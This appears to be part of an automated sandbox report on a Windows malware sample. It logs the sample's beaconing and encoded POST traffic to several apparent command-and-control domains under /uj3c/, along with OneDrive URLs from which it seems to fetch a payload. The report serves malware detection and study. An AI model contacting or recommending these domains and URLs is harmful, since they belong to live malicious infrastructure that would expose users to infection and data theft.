            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=aL7cM5bWXy4HE7vWB0nbwz9R2nEE3UQV4bcsZzkldkiOPNKheX3xai9N2uMecq2n4iLl&aN68=XPUturKxIt HTTP/1.1Host: www.designgamagazine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=nXdwAKxpMTcrQ5TaEdKYb/3fLEm5MxmqnP6pt6tXZcCcrT8F9jyrfCLZmxy8K87KDFFG HTTP/1.1Host: www.kidsfundoor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=jp9IFxSAbKEUnISDMr23fKSuCkvCee63R6j+FOwVtZA50OWyPGwkYlgwJ8c08P9Q1FY9 HTTP/1.1Host: www.empireapothecary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=A8JZ3elzzydaQ7+MlvhsR6GCRneHcYeXHZTwnFT58BDo/ENWLDTcswSqcnTzzkhbJMnE&aN68=XPUturKxIt HTTP/1.1Host: www.moneytaoism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=QpZU5iWZZ+8RnceDxX1N22UuePdp1ta0hAtWyR6NsMGaje0l6aHG9rnjt2nJUX26kpQ0&aN68=XPUturKxIt HTTP/1.1Host: www.trendiddas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi HTTP/1.1Host: www.trisuaka.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /uj3c/?r4S0P=gHeddp3rEbyt6G4S2ENO5jUfv41eCHMoiHYIOJLTbAbXI9CsqM4W4jpYcdbraNUyjMQx&aN68=XPUturKxIt HTTP/1.1Host: www.nomaxdic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 81.169.145.158 81.169.145.158
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: r4S0P=uFXPltv3OMKunl7vTF8JSTw7oCoIDgHD9URfKIcISJcYtvaTVyYAa-MMQR3ufeEUp9cTN3ovJF9leS8hdtvcXEdT1Czk7CFiD409RDLraONxqHICx8aX44q3L_FZHjAuU8UHsekcofffT0p95WlsPpMZnNVRRzwsxjWRdl6lpIlD9kv8asWaJl2xSgmpiDSevxNQnYPXenk9LVfRYMwI(e6Bfmq-MfYLcwiy5GTOJl4e8H7tIb(iEKiw7mkyXbFtMW7t8SAVBjNSpkvnPXanpOuYv3nn7AZSc74nO8pbcHySeRcZeSxRgjg2tBbuOyGKRjEpuT2b3nltec1F7QNs3RChfzQS1G8aD1rYelVnLTX_7HRq9JBsMNZ02a5z9mATRViXDj3wwpbVxfCNjQ).
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 70 76 6c 41 59 36 6e 34 46 6e 4d 51 32 63 47 63 43 41 35 37 69 73 39 4d 42 72 63 35 6c 42 68 4f 4a 41 31 44 39 30 30 70 66 47 2d 43 68 70 64 61 5f 39 69 4b 56 62 71 4f 76 34 4c 70 38 34 70 4e 30 45 76 59 7a 46 31 66 78 56 4d 63 50 33 66 57 6b 63 33 32 43 7a 32 32 6e 63 79 44 34 77 4c 52 44 44 37 61 5f 78 78 72 68 4d 43 35 64 61 71 79 34 72 79 47 65 6f 41 49 44 46 2d 55 38 64 61 73 63 77 63 6f 76 62 66 53 58 78 2d 28 55 4e 76 4d 4a 4e 54 73 74 56 45 45 6a 74 4c 78 6a 53 7a 64 6b 47 6c 71 2d 31 44 28 33 33 38 66 64 57 56 47 31 32 30 44 77 6e 72 70 6a 4f 50 76 78 52 45 6e 59 6e 70 65 54 6b 39 4e 31 66 63 61 72 4e 5f 70 5a 47 53 64 6c 33 55 4d 66 6b 78 62 68 75 51 35 43 43 64 65 48 51 31 7a 45 53 36 49 64 50 4d 43 71 69 30 7a 47 6b 6c 58 62 46 4a 4d 57 37 50 38 57 45 56 42 6b 5a 53 6f 43 72 6e 4a 32 61 6f 73 75 75 64 36 48 6e 46 34 77 6b 68 63 37 77 33 4f 38 68 39 63 77 53 53 66 77 73 5a 65 6e 63 48 31 7a 68 39 6a 68 62 4e 45 53 47 52 52 6a 45 62 75 52 4f 4c 33 51 39 74 65 49 68 46 38 79 31 73 78 68 43 68 44 6a 51 55 73 32 35 48 44 31 6a 55 65 6b 6c 52 4c 67 62 5f 37 56 5a 71 7a 49 42 73 50 39 5a 30 77 61 34 38 31 6a 68 71 56 79 32 58 42 69 54 4c 6e 4d 47 52 28 65 58 37 38 31 4f 5f 4d 63 44 44 63 66 6c 53 6a 56 6b 67 56 72 7a 56 67 4a 51 53 4b 64 76 34 37 51 77 65 73 53 38 4d 47 73 28 39 48 4e 64 4c 4b 6c 73 48 58 37 4e 54 6e 30 49 4e 37 6b 52 74 71 35 50 32 61 71 45 33 46 72 52 61 78 58 36 7a 47 52 31 30 61 47 36 44 33 5a 41 4f 4e 74 57 74 72 5f 70 43 35 48 57 32 6a 4c 54 53 73 44 66 65 47 5a 41 37 49 6a 30 67 68 53 31 78 6c 33 7a 4e 73 39 65 4c 57 59 6a 77 6b 47 46 33 70 35 67 66 56 4a 69 74 66 36 6a 7a 66 4b 50 6c 70 4d 57 48 31 4b 66 46 70 50 50 73 32 31 41 59 47 41 4f 73 4a 34 6d 58 33 6b 48 51 69 6a 74 41 45 70 53 4f 4c 71 75 69 64 35 56 31 41 62 4e 68 58 53 6e 5f 32 68 39 49 47 51 39 75 46 41 44 39 38 71 4b 70 79 62 5a 4e 30 35 4a 59 4e 31 38 4f 4b 61 4a 68 35 74 45 6e 44 35 6d 57 44 6c 49 66 79 58 33 57 71 41 44 52 43 76 67 6f 41 55 73 69 6e 6a 4f 31 4c 43 75 55 53 5a 65 77 6e 48 44 6c 6e 75 4c 74 32 4f 4c 39 47 30 6e 63 58 42 67 5f 57 34 66 33 76 39 45 34 69 33 57 62 65 59 55 64 50 6c 48 53 6e 72 6c 72 34 4e 45 47 76 4d 44 5f 53 69 5a 79 71 75 62 5f 61 6f 49 74 4b 56 6d 76 5a 65 78 74 6e 42 38 61 6a 30 6c 64 52 38 36 48 42 6a 39 48 6e 38 4b 59 42 2d 4c 77 65 78 79 68 32 50 32 58 6e 52 35 61 66 64 55 4b 33 41 64 50 72 2d 4e 74 7e 67 54 30 4d 30 79 68 48 6e 71 4b 4f 67 74 62 68 76 48 42 4b 4e 5a 77 63 47 78 2d 4f 71 4f 6e 72 35 58 6b 48 34 45 35 4b 51 59 4d 36 2d 7e 5f 52 79 35 54 74 6f 74 6e 6d 71 6c 45 51 67 34 4a
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4a 62 38 4a 4b 53 6d 76 30 4a 45 72 42 64 57 36 54 30 64 75 5a 46 55 50 30 45 57 6d 41 39 4d 55 65 37 49 56 67 7a 5f 59 65 53 6e 6f 70 74 53 77 6b 73 6e 44 49 37 4b 65 66 77 77 6b 5a 4a 36 77 67 66 49 6e 65 43 68 7a 58 70 75 77 6d 31 59 75 71 51 41 69 63 73 76 62 55 50 72 61 52 4c 37 47 58 6e 50 7a 6f 54 43 43 45 52 59 31 4e 33 53 31 67 77 41 53 48 41 36 4b 75 76 6a 33 73 68 38 71 48 39 6f 45 4e 48 48 77 56 57 79 69 44 69 48 39 69 76 32 57 78 57 52 6a 47 76 6a 44 6c 6a 4c 34 6a 4a 4d 43 4c 57 45 74 69 6a 69 4c 44 47 46 66 4a 67 68 54 5f 7a 4a 7a 71 69 76 65 7a 33 33 4c 55 47 72 77 34 39 53 74 69 74 2d 36 4a 53 4b 68 56 37 54 6b 59 61 43 33 73 62 4e 76 53 4e 49 66 4f 44 33 55 76 76 35 74 49 45 6e 51 31 53 75 53 56 71 37 7a 72 64 63 75 4d 6d 4c 79 32 5a 32 69 34 6f 54 70 67 48 6d 46 67 33 59 58 6c 45 58 61 2d 33 57 30 67 70 39 6d 33 34 34 28 67 4b 42 78 6d 49 5a 4e 58 37 51 6e 32 34 6c 79 39 5a 71 45 53 4e 75 71 54 6a 37 69 71 48 73 4e 5f 55 34 69 43 5a 6c 4c 65 61 74 53 39 38 2d 28 50 6e 68 4d 45 53 78 52 79 51 6e 6e 35 68 79 55 58 4e 75 63 30 7e 51 51 53 4e 52 6a 74 6f 36 76 52 67 6a 46 51 48 44 6c 70 35 74 61 68 48 44 30 6c 63 6a 69 58 79 37 52 4c 45 36 55 61 75 72 55 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: r4S0P=vFqnDJb8JKSmv0JErBdW6T0duZFUP0EWmA9MUe7IVgz_YeSnoptSwksnDI7KefwwkZJ6wgfIneChzXpuwm1YuqQAicsvbUPraRL7GXnPzoTCCERY1N3S1gwASHA6Kuvj3sh8qH9oENHHwVWyiDiH9iv2WxWRjGvjDljL4jJMCLWEtijiLDGFfJghT_zJzqivez33LUGrw49Stit-6JSKhV7TkYaC3sbNvSNIfOD3Uvv5tIEnQ1SuSVq7zrdcuMmLy2Z2i4oTpgHmFg3YXlEXa-3W0gp9m344(gKBxmIZNX7Qn24ly9ZqESNuqTj7iqHsN_U4iCZlLeatS98-(PnhMESxRyQnn5hyUXNuc0~QQSNRjto6vRgjFQHDlp5tahHD0lcjiXy7RLE6UaurUQ).
            Source: global trafficHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.nomaxdic.comConnection: closeContent-Length: 36479Cache-Control: no-cacheOrigin: http://www.nomaxdic.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nomaxdic.com/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 76 46 71 6e 44 4d 6a 75 4e 36 7e 7a 71 6b 46 76 70 30 51 56 69 54 6b 66 76 6f 78 4c 44 57 41 4a 78 42 4e 69 4c 4c 28 66 55 6c 48 68 50 65 50 6f 73 75 68 77 77 6d 30 65 4f 64 54 4f 61 2d 4d 5f 6b 5a 78 41 77 67 54 49 67 65 72 2d 77 30 52 51 77 44 68 62 6f 4b 51 53 77 4d 73 6d 52 77 50 57 61 52 66 6a 47 58 75 43 7a 59 76 43 44 6d 5a 59 68 2d 76 62 74 67 77 5a 52 44 6b 32 56 2d 6a 2d 33 73 70 65 71 46 70 6f 44 39 62 48 78 77 65 7a 67 45 32 45 37 79 76 7a 54 78 58 42 74 6d 6a 33 44 6c 58 6c 34 69 6c 4d 46 35 69 45 74 7a 44 69 61 51 65 45 4c 70 67 6b 42 50 7a 2d 33 71 65 36 65 7a 72 7a 4c 51 28 51 7a 4e 56 53 76 53 74 5f 7e 61 44 33 32 53 62 45 33 59 75 6c 33 70 43 70 76 6e 74 51 66 4d 58 50 58 63 6e 4a 69 4b 73 42 51 7a 4b 45 43 46 71 5f 34 4c 64 39 75 4d 6d 72 79 32 5a 63 69 34 34 54 70 6a 6e 6d 46 46 37 59 42 58 38 51 44 2d 33 54 39 41 6f 36 69 33 31 44 28 67 69 72 78 6a 39 43 4d 67 44 51 68 6a 63 6c 33 38 5a 74 49 79 4e 73 6b 7a 6a 69 35 36 48 76 4e 5f 55 61 69 44 5a 31 4d 74 65 74 41 59 49 2d 34 74 28 68 4f 30 53 78 49 43 51 6c 73 5a 74 69 55 58 46 51 63 78 43 6d 51 6c 56 52 69 2d 67 36 68 51 67 6a 45 41 48 44 74 4a 34 73 4c 30 36 75 7a 56 49 4e 77 31 7e 32 62 38 64 33 5a 5a 75 67 44 4e 72 6a 6a 33 36 6b 59 37 39 78 61 41 39 5f 69 69 28 7a 58 30 67 71 52 42 57 57 28 68 55 68 31 48 39 55 55 73 41 5a 48 71 72 52 61 63 6f 32 7a 46 52 4a 70 37 51 79 4a 43 58 55 53 63 5a 45 35 4a 68 66 62 65 78 67 46 52 5a 32 43 7a 78 73 73 39 71 5f 68 71 76 50 72 63 31 77 44 43 53 55 37 6d 47 48 57 79 78 6b 78 42 7a 73 56 63 52 65 36 71 65 6f 54 62 7e 64 70 39 63 48 58 41 48 32 28 49 7e 4d 31 46 7a 48 69 74 48 58 49 6f 36 6f 51 65 54 38 6b 47 79 65 62 6b 4e 63 63 74 70 56 6c 4c 65 45 6f 74 53 78 39 55 68 6c 33 30 32 77 75 30 6c 34 6e 37 63 6d 59 67 42 51 72 36 73 4d 7a 77 37 4a 6b 67 32 59 42 43 7a 7a 67 68 5a 50 47 6a 75 55 6d 42 6a 35 52 6d 30 42 72 33 51 4d 55 61 6e 4b 71 54 76 59 76 55 64 49 73 4d 45 74 56 43 65 2d 6b 42 58 54 65 44 4b 64 44 66 74 62 78 63 64 66 68 36 45 68 54 6d 6e 51 34 65 71 49 63 6b 78 4d 38 30 51 62 77 45 4f 66 38 67 34 73 53 50 4f 52 39 62 51 44 78 33 61 38 73 7a 54 30 69 73 70 4f 31 4a 30 65 5a 70 43 56 58 37 36 49 4e 52 69 34 46 30 77 76 67 6b 36 30 6f 48 51 5a 45 62 6b 50 57 58 71 6d 32 62 50 50 54 32 49 41 6c 53 77 61 67 68 76 39 4f 48 6d 53 79 6b 59 7a 51 69 4f 74 4a 67 6f 6a 73 5f 6d 6d 57 6c 4c 71 6c 61 79 53 7e 47 64 76 71 52 59 78 75 4f 56 79 47 75 47 52 79 69 35 6c 68 6f 77 64 68 62 65 36 41 65 57 6e 56 73 66 63 77 50 35 46 6e 61 4d 4f 30 6d 28 5f 6c 5f 52 54 63 67 6e 79 4d 31 47 4d 55 7a 77 76 38 52 50 35 31 4c 71 51
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 08 Aug 2022 18:14:24 GMTContent-Type: text/htmlContent-Length: 291ETag: "62f13bce-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Aug 2022 18:14:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 18:15:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 65 6e 64 69 64 64 61 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trendiddas.com Port 80</address></body></html>
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: TR0627729920002.exe, Jwjxmakrv.exe.0.drString found in binary or memory: http://www.emerge.deDVarFileInfo$
            Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nomaxdic.com
            Source: rundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nomaxdic.com/uj3c/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/9
            Source: Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/dK
            Source: Jwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6Ib
            Source: Jwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzP
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xB
            Source: Jwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB
            Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/2A
            Source: Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/k
            Source: unknownHTTP traffic detected: POST /uj3c/ HTTP/1.1Host: www.trisuaka.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.trisuaka.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.trisuaka.xyz/uj3c/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 72 34 53 30 50 3d 75 46 58 50 6c 74 76 33 4f 4d 4b 75 6e 6c 37 76 54 46 38 4a 53 54 77 37 6f 43 6f 49 44 67 48 44 39 55 52 66 4b 49 63 49 53 4a 63 59 74 76 61 54 56 79 59 41 61 2d 4d 4d 51 52 33 75 66 65 45 55 70 39 63 54 4e 33 6f 76 4a 46 39 6c 65 53 38 68 64 74 76 63 58 45 64 54 31 43 7a 6b 37 43 46 69 44 34 30 39 52 44 4c 72 61 4f 4e 78 71 48 49 43 78 38 61 58 34 34 71 33 4c 5f 46 5a 48 6a 41 75 55 38 55 48 73 65 6b 63 6f 66 66 66 54 30 70 39 35 57 6c 73 50 70 4d 5a 6e 4e 56 52 52 7a 77 73 78 6a 57 52 64 6c 36 6c 70 49 6c 44 39 6b 76 38 61 73 57 61 4a 6c 32 78 53 67 6d 70 69 44 53 65 76 78 4e 51 6e 59 50 58 65 6e 6b 39 4c 56 66 52 59 4d 77 49 28 65 36 42 66 6d 71 2d 4d 66 59 4c 63 77 69 79 35 47 54 4f 4a 6c 34 65 38 48 37 74 49 62 28 69 45 4b 69 77 37 6d 6b 79 58 62 46 74 4d 57 37 74 38 53 41 56 42 6a 4e 53 70 6b 76 6e 50 58 61 6e 70 4f 75 59 76 33 6e 6e 37 41 5a 53 63 37 34 6e 4f 38 70 62 63 48 79 53 65 52 63 5a 65 53 78 52 67 6a 67 32 74 42 62 75 4f 79 47 4b 52 6a 45 70 75 54 32 62 33 6e 6c 74 65 63 31 46 37 51 4e 73 33 52 43 68 66 7a 51 53 31 47 38 61 44 31 72 59 65 6c 56 6e 4c 54 58 5f 37 48 52 71 39 4a 42 73 4d 4e 5a 30 32 61 35 7a 39 6d 41 54 52 56 69 58 44 6a 33 77 77 70 62 56 78 66 43 4e 6a 51 29 2e 00 00 00 00 00 00 00 00 